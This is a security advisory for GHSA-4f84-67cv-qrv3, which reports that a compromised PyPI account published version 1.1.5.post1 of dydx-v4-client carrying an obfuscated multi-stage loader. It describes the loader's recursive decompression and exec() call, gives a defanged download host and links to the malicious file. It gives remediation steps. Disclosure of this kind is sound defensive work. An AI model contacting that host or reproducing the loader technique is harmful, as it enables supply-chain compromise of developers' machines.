GHSA-4f84-67cv-qrv3: A single post-release of dydx-v4-client contained obfuscated multi-stage loader
A PyPI user account compromised by an attacker and was able to upload a malicious version (1.1.5.post1) of the dydx-v4-client package. This version contains a highly obfuscated multi-stage loader that ultimately executes malicious code on the host system.
While the final payload is not visible because it is tucked away inside 100 layers of encoding, the structural design—specifically the use of recursive decompression followed by an exec() call is a definitive indicator of malicious software, likely a “Crypter” or “Dropper” masquerading as a cryptocurrency-related utility with the intent on connecting to hxxps://dydx[.]priceoracle[.]site/py
to download and execute further payloads.
Users of the dydx-v4-client package should immediately uninstall version 1.1.5.post1and revert to the last known good version (1.1.5) or later secure versions once available. Additionally, users should monitor their systems for any unusual activity and consider running security scans to detect any potential compromise.
References
- github.com/advisories/GHSA-4f84-67cv-qrv3
- github.com/lenktn/lenktn-dydx-v4-python
- github.com/pypa/advisory-database/tree/main/vulns/dydx-v4-client/PYSEC-2026-1.yaml
- inspector.pypi.io/project/dydx-v4-client/1.1.5.post1/packages/4b/06/4d848676e932b0fc9d707bb78603dc76555141cc832819cd1e5077bdf2a2/dydx_v4_client-1.1.5.post1.tar.gz/dydx_v4_client-1.1.5.post1/dydx_v4_client/_bootstrap.py
Code Behaviors & Features
Detect and mitigate GHSA-4f84-67cv-qrv3 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →